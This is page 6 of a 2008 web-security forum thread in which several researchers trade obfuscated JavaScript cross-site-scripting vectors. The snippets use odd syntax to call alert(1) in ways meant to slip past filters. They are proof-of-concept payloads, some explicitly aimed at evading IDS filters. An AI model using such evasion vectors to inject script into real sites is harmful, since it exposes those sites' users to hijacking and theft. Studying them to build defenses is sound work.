Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 6 of 16
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 15, 2008 05:17PM

slackers : find ['holes'] in ['everything']

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 15, 2008 05:20PM


sure:with('morfi')you:'can',prompt('ly');throw 'your',(self in top),'position';of:'any'+(contest=!!!1);-P

I have been asleep already but stood up to get a bottle of water - this happens when you check slackers on the way ;)

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 15, 2008 05:24PM

@Gareth: isn't it: 
slackers : !(find ['holes'] in ['everything'])
? :)

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 15, 2008 05:28PM

Dont : try { window['s'] } finally { use : /a/ ['real'] } /os/

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 15, 2008 06:03PM

@mario

lol

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: thornmaker
Date: January 15, 2008 10:01PM

I:would=/l/i;ke:to=alert;so=/methin/g;ind=/ef/i;nit='ely',but='sadly';I:do{_='not';know=/how/;to(_)}while(/remainin/g<'legible')



Edited 1 time(s). Last edit at 01/15/2008 10:09PM by thornmaker.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 16, 2008 04:22PM

More or less just weird looking - but anyway ;) 

æ:with(/æ/)õ:'æ';Þ:!0e1,alert(/Ð/);throw'å',(1in Þ),'æ';ã:'å'+(æ=1);-ã

Options: ReplyQuote
Re: New XSS vectors
Posted by: Phiera
Date: January 16, 2008 06:12PM

it looked fun so i thought i'd try:

['red'],alert('sum 1 is');try{1in to}catch(me){alert(!1 & 'the police');}

My first vector!


---------

" - - signiture goes here - - "

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 23, 2008 08:07AM

Here's a null injected string but with unicode escapes:-

x='aler\u200ft(1)'
eval(x)

Quite cool I thought :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 23, 2008 03:38PM

Awesome stuff:-
http://pseudo-flaw.net/log/2008/01/23/self-referencing-content-when-html-becomes-script

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 23, 2008 04:28PM

@Gareth: Indeed!

Options: ReplyQuote
Re: New XSS vectors
Posted by: thornmaker
Date: January 23, 2008 09:20PM

That's awesome Gareth... I love it!

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 24, 2008 02:38AM

Funny and almost scary Gareth, cuz I played with the same idea yesterday when I wanted to bypass Firefox's cookie domain restrictions by evaling a unicode null equivalent.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 24, 2008 03:58AM

@Ronald

Great minds think alike :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 24, 2008 04:08AM

hehe

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 24, 2008 06:36AM

typeof AnYThing^alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 24, 2008 06:46AM

 with(' the help of'+ typeof AnYThing )alert(1);s :-P

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 24, 2008 08:05AM

k this is silly, but this can get weird with this 

String.prototype.can_i_has_alert('?') = function() { this.toNumber(alert('okthxbye!')); }; this.can_i_has_alert('?');

I'll leave you alone now ^^

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 24, 2008 08:28AM

Ok this is just really silly:-

undefined=alert;
typeof typeof typeof typeof typeof typeof typeof typeof undefined(1);

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 24, 2008 08:38AM

and if you thought that was crazy.....

throw delete typeof typeof alert(1)

Might as well put a void in there too:-
throw delete void typeof typeof alert(1)

and finally:-
void void void typeof delete 1..eval('alert(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/24/2008 08:44AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 24, 2008 09:35AM

o={a:#1=alert};
a=o.a;
a(1);

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 27, 2008 05:22PM

'moving',back,'or',forward,'...just',find(/a way/),'to',stop('the'+focus, 'on',411,this.alert('s'))

Options: ReplyQuote
Re: New XSS vectors
Posted by: sirdarckcat
Date: January 27, 2008 07:01PM

0.[!0?/eval/[~0]:$](name).@_
hehe

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/27/2008 07:01PM by sirdarckcat.

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 28, 2008 05:41AM

document.* = function() {
 alert('crazy stuff');
}
document.*()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 28, 2008 05:56AM

<><this/><is/><valid/><javascript/></>..*.*.*..text(alert('Hehe'));

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 28, 2008 06:00AM

more * stuff:-

({strange:'stuff man'}).* = alert(1);

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Anonymous User
Date: January 28, 2008 06:21AM

Nice ones! I smell danger for the IDS filters ;) 

top.* =alert,self['*'](1)

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 28, 2008 07:33AM

__proto__ also refers to the current window :D

a=__proto__['alert']
a(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 28, 2008 08:10AM

Unicode control characters:-

\u000Aalert\u000A(1)
alert\u000D(1)
alert\u2028(1)
alert\u2029(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors
Posted by: Gareth Heyes
Date: January 28, 2008 09:30AM

More hash fun:-

SyntaxError[a=#1=alert];
a(1);

a=#1=alert;
a(1);

Sharp variables only work in Mozilla btw:-
http://developer.mozilla.org/en/docs/Sharp_variables_in_JavaScript

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/28/2008 09:32AM by Gareth Heyes.

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 6 of 16


Go to: Forum ListMessage ListSearchLog In
Sorry, you can't reply to this topic. It has been closed.

Falling Rock Networks

sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle. *